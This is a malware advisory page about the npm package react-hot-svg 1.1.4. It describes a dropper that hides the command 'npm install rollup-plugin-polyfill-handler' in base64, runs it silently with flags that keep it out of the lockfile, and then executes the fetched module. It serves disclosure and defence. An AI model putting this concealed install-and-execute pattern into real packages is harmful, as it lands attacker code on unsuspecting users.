VDB
KO

MAL-2026-10439

Malicious code in react-hot-svg (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (847fe0ea93982597b0611e6fd23f1b77af40b7162baf338659fbff8deb7fb051) index.js in react-hot-svg 1.1.4 hides both a shell command and a package name as base64 strings named `svgValidateKey` and `svgValidatePattern`. When any of the exported API surface (`getPlugin`, `setPlugin`, `validateSvgContent`) is invoked, the code decodes `svgValidateKey` via `atob` to the string `npm install rollup-plugin-polyfill-handler --no-save --silent --no-audit --no-fund`, spawns it via `child_process.spawn` with `stdio: 'ignore'`, and on process exit `require()`s the base64-decoded module name `rollup-plugin-polyfill-handler` and immediately invokes its `.getPlugin()()` function. The `--no-save --silent --no-audit --no-fund` flags suppress output and prevent the added dependency from appearing in package.json or the lockfile. The obfuscation of both the command and the required module name, the SVG-themed cover identifiers, and the pattern of installing-then-requiring-then-executing an undeclared external package match a dropper that lands and executes attacker-controlled code from a separate npm package on any consumer who uses this library's advertised API.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / react-hot-svg

No fixed version published yet for react-hot-svg (npm). Pin to a known-safe version or switch to an alternative.

References